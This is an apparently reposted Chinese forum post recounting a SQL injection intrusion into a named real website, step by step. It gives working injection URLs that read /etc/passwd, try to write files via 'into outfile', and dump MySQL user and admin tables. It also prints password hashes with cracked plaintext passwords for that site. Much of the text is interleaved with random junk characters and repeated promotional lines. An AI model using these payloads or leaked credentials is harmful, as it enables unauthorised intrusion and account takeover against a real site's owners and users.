|
" F0 E e$ l! M+ ?
B' o* p( k8 Z# _+ F0x01. 检测 www.zuaa.jp 收集数据4 v7 k5 W0 K W$ k! g, f
0 L6 a: z8 ]7 \1 F, m8 K4 [
# ^- p* V7 y% C7 e: z1 [whatweb) W; d. @* ], q' N
' i( |8 O4 a# ] C8 R9 a9 w; w: r2 y( Y2 E. {& T; l
利用NMAP扫描
) G6 ?' Q _; j0 f" ~, e) J, V8 S4 m) R7 N$ U6 U2 \) e, J0 Q6 r
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
* J& Q( J! } r0x02.找注入点- u7 J8 _1 T8 b
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
% t5 p! e2 @$ d) B4 @/ i e% ]( L9 M' S4 j8 r- x2 _
, G4 W# ]4 v& B: O" U
0x03.order by) J7 D+ j& g/ ^ @: V4 T
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
. c# ^, F0 D0 O
5 `) _/ z2 }9 l8 M" H6 D+ x( Forder by 28报错,order by 27正常
. l* ]& C* Z# I
7 X# o* H6 d% x; J5 v0x04. union手动查询
1 i4 t1 C( c+ h! T; M: L3 `8 P" O2 Xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
' }5 a) F8 B7 \$ S4 x3 p8 U添加到 27 时正常显示 ) Y, y3 L2 w" U+ Z) {/ z0 p
! M5 h( J! H0 l% }1 \; S+ F中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
$ l* Y% ^; v+ H& H7 d/ v: I
! P+ f7 F5 k0 P$ I/ n0x05. info:
5 x: {2 y0 j- W9 G& k$ n5 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + n: ~8 `0 D$ t! s
6 j/ f* J( m8 f s, luser: root@localhost" ~6 n; ]5 g: j! F4 Q$ N
database: openpne2 ~; V3 e* o# E* ?6 X
version: 4.1.220 g6 i; x. k9 Z( f
os: portbld-freebsd5.48 n1 G( Y0 Q+ o+ m# n
9 O0 o1 P! A( R% `. F# {7 @/ r& x6 @; P0x06. root用户2 }! w4 D4 {6 \- K4 l( _
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
6 J" O) k* l6 {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 Q1 S9 r) H5 n' _" y% ^
: _8 u" [" V+ o# I: Z* B& e通过工具转换
4 N( e0 v9 m" j' l6 v9 d1 D9 S* A3 ?: P; k3 u; p6 o: w
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持+ \$ K% |* A* B9 o3 E3 [
' x1 f/ X6 p3 o* h
0x07. 利用 into outfile
* c/ G+ Q5 j+ H全部都失败$ K! ?+ V( E9 E# f
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
8 |1 @" l2 `; P' |5 G8 {6 Q! v
! t# g/ P7 C1 z. C6 P3 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
& ^3 Q5 B: w* w& `4 x
# T* X; c1 e" c$ ]/ x8 _页面显示“MDB2 Error:syntax error”
! X' B% H1 e5 O; h0 w; t( f1 ?
# }1 x! G! b. v$ v0x08. 利用 mysql 4.1
+ d4 O+ ^3 ?+ C6 b! x猜常规表名,字段未果 工具 sqlmap5 }. P0 ^: `4 n
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
' p9 K- [; m/ _8 e
' B% N+ {/ K- V
+ m3 u$ k& o9 r. n
( j& K, l M8 q s5 }0x09. 查找后台# g! B( H: G; v7 D, }( f
利用 现有的各种 后台工具尝试都不行% q6 \1 t: D: L. b3 m$ E. X2 c
5 o# C! C7 N( y% c2 {
0x10. MySL外联方法) H) N2 k" T, r6 Y
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
3 I9 d& q$ z1 c2 ^$ P, w+ V- g可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user; {4 f0 ]; h( d
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user( ]$ u" ^, c* H+ X+ O% C5 _
* I4 E( g! M+ W0 Z! e/ g
这个可以在 www.cmd5.com 解密. J$ {. Y% m! B$ _8 R7 N: k
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
4 N% h- w, ~8 L H& G8 l& U) Xchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad970 N [6 }: \3 D: V E2 s4 @
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???+ W/ m7 W. p# K% j; T9 }
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
" d/ v, b+ W1 y! d- l工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知/ {+ x1 p+ J, r- i
/ Q' A! y9 i: `; T: \/ f2 {- B2 [( \. k4 U: X! w- x9 p; _
0x11. 网站突破7 H, `9 n7 A+ ]3 c, N7 U1 E, c
发现网站的源程序 openpne, google 下载 openpne 源码
( P: r d1 R+ ?/ Q
' L9 H/ `+ K& V7 c: q7 h4 f: q) T8 L* B
0x12. 默认信息利用$ [" g& }& |: o5 }& C: [0 c
http://sns.zuaa.jp/?m=admin&a=page_login \! |( c; K- B
7 O! X8 H! m7 K+ N表名 (c_admin_user) ,字段名(username,password)
" b+ q* k/ [" I8 e; vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
7 Z$ H* H* u- K# z' ?; `7 T8 v+ {& D# F% a2 P! z P$ ]
解密5 j* L ?3 z7 }" K8 t2 V. R
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
& \2 d6 |. i2 Z" ?7 j) s e9 Pzuaajp:c0923ec5857796a393da99905008c176, zju1897& D G( ?0 ~4 N6 j
% h4 M- y4 o: p" f$ O& e中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
, r) L% ^1 y8 T5 Y1 S+ V( t/ D) c, K8 v! {% w; ^- @" O. `7 _
0x13. 登录后台
6 @2 m( ?: t1 N; e( U
8 {0 h" G+ e/ Y9 q
4 C$ `: d/ H4 F8 T1 Y7 j8 ~ y1 u( o& R) `3 S
0x14. 小结
+ P6 z; V) f9 Q x利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。- _$ o0 u; S) \2 p* Z, ~
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
8 A0 V& ~% c2 H5 N! [8 a7 f------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain) H3 p/ _9 q1 T; J: X' ~5 u6 @
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 q0 J! e$ ?# Q8 o
8 D P. j* _9 u( m
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!0 @0 |& H/ e' l9 C6 b" `
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|